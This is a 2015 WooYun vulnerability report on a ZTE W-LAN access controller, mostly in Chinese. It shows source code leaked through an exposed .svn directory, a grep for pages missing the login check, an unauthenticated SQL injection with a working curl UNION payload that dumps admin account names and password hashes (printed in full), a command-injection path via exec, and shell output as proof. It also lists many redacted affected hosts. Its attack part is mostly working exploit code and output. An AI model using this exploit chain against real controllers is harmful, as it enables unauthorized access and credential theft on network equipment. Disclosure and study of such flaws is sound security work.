当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151898

漏洞标题:中兴W-LAN无线接入控制器从信息泄露到cmdshell

相关厂商:中兴通讯股份有限公司

漏洞作者: 路人甲

提交时间:2015-11-07 21:37

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-07: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-13: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

rt

详细说明:

中兴通讯 - WLAN无线接入控制器
存在SVN信息泄漏,可导致源码信息泄漏。

aaaaaaaaaaaaaaaaaa111111111111111111111111.jpg


aaaaaaaaaaaaaaaaa2222222222222222222222222222.jpg


能够有权限的大部分的代码都有isLogin,譬如

<?php/*
文件名:sync_config.php
作者:chent
修改记录:
2012-03-15 liangjl 增加:完成此页面后刷新主页面
20110822 liangjl 恢复系统配置时,AC名字也要恢复成默认值
20110208,pangm,修改reboot命令的使用方式
20101028,pangm,写入syslog日志时,去除IP地址前的"::ffff:"
20100824,pangm,实现恢复系统配置操作
20090827,chent,修改配置保存时间的格式为形如: 2009-08-27 17:33:27,且只有在保存配置时更新此时间
20090822,chent,保留备份,以防万一
20090822,chent,PHP在裁减系统上无法用rename函数移动目录,因此改用调用系统mv命令来移动目录
*/?>
<?php include 'isLogin.php' ?>
<?php
session_start();
?>


所以

grep -i -r -L 'islogin.php' --include='*.php' ./|more
.//ap/getIfApListFileExit.php
.//apgroup/getChannelByCountryCode.php
.//apgroup/wait_apgroup_inport.php
.//func/LicenseFunc.php
.//include/page.php
.//include/template.php
.//index.php
.//log/getIfApGroupExist.php
.//login.php
.//policy/IsWlanServiceEnable.php
.//policy/wait_policy.php
.//resetWebsvr.php
.//wait.php
.//wlan/getIfApUserExist.php
.//wlan/IfPasswMatch.php
.//wlan/SomeOrNone.php
.//wlan/wait_wlan.php
.//wlanport/getSsidByGroupid.php


找了下,注射一枚

<?php
/*********************************************************
**File: 根据国家码获取信道值
**Author:liucj
**Date: 2013-04-08
**Modify history:
**********************************************************/
?>
<?php
$CountryCode = $_POST['CountryCode'];
$ChannelType = $_POST['ChannelType'];
$DBNAME = "sqlite:/icac/db/icac_cfg/icac_cfg.db";
$dbh = new PDO($DBNAME);
$sql = "select ChannelValue from CCAndChannelRelations where CountryCode = '".$CountryCode."' and ChannelType = '".$ChannelType."'";
$stmt = $dbh->query($sql);
$result = $stmt->fetchAll();
$stmt = null;
$dbh = null;
echo json_encode($result);
?>


exp:

curl '**.**.**.**/apgroup/getChannelByCountryCode.php' -d "CountryCode=' union select UserName || '|'  || PassWord from LoginAccount --" -k
[{"ChannelValue":"admin|b7d5f153148d530064bb4b179b947349","0":"admin|b7d5f153148d530064bb4b179b947349"},{"ChannelValue":"icac|929193c8d183f6837c88b8a03e8c0bed","0":"icac|929193c8d183f6837c88b8a03e8c0bed"},{"ChannelValue":"user|c24a542f884e144451f9063b79e7994e","0":"user|c24a542f884e144451f9063b79e7994e"}]


然后就是各种管理权限了

cat ap/ap_hardware_info.php 
<!--
/*********************************************************
**File: AP软硬件配置信息
**Author:冯朝晖
**Date: 2009-04-21
**Modify history:
*
**********************************************************/
-->
<?php include '../isLogin.php' ?>
<?php
safeVar($_COOKIE);
safeVar($_GET);
safeVar($_POST);
safeVar($_REQUEST);
?>
<html>
<head>
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/css/<?=$_COOKIE["_CSS_MAIN"]?>" rel="stylesheet" type="text/css">
<title><?=HTITLE_SOFTHARD_CFGINFO?></title><!--软硬件配置信息-->
</head>
<?php
$ApId = $_REQUEST['ApId'];
$ip = $_REQUEST['ip'];
$ManufId = $_REQUEST['ManufId'];

$arrColName = array("EquipModel" => ROW_DEVICETYPE,//"设备型号",
"HardVer" => ROW_HARDVER,//"硬件版本",
"SoftwareName" => "软件名称",
"SoftVer" => ROW_SOFTVER,//"软件版本",
"FirmwareVer" => ROW_FIRMVER,//"固件版本",
"CpuModel" => "CPU型号",
"CpuSpeed" => "CPU处理能力",
"MemCapacity" => ROW_MEMORY_CAPACITY,//"内存容量",
"MemModel" => "内存型号",
"FlashCapacity" => ROW_FLASH_CAPACITY);//"FLASH容量");

$cmd = "get_shm_apinfo -a ".$ApId;
$arr_ApInfo = array();
$ret_val = -1;
$last_line = exec($cmd, &$arr_ApInfo, &$ret_val);
//echo "last_line=".$last_line."<br>";
//echo "ip=".$ip."<br>";


搞定!

ifconfig
eth0 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:40
inet addr:**.**.**.** Bcast:**.**.**.**55 Mask:**.**.**.**
inet6 addr: fe80::8674:2aff:feab:ea40/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:814196149 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:15
RX bytes:194057593507 (180.7 GiB) TX bytes:0 (0.0 B)
Interrupt:25 Base address:0xc000
eth0:1 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:40
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:25 Base address:0xc000
eth1 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:41
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:15
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:26 Base address:0xd000
eth2 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:42
inet6 addr: fe80::8674:2aff:feab:ea42/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:15
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:27 Base address:0xe000
eth3 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:43
inet6 addr: fe80::8674:2aff:feab:ea43/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:15
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:28 Base address:0xf000
eth4 Link encap:Ethernet HWaddr 84:74:2A:AB:EA:44
inet6 addr: fe80::8674:2aff:feab:ea44/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:15
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:29 Base address:0x1000
lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:8862210 errors:7182532 dropped:7182532 overruns:0 frame:0
TX packets:8862210 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:570985424 (544.5 MiB) TX bytes:570985424 (544.5 MiB)


注意:别信SQLmap

漏洞证明:

案例:

**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries

修复方案:

删除.svn等文件

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-10 17:06

厂商回复:

感谢关注

最新状态:

暂无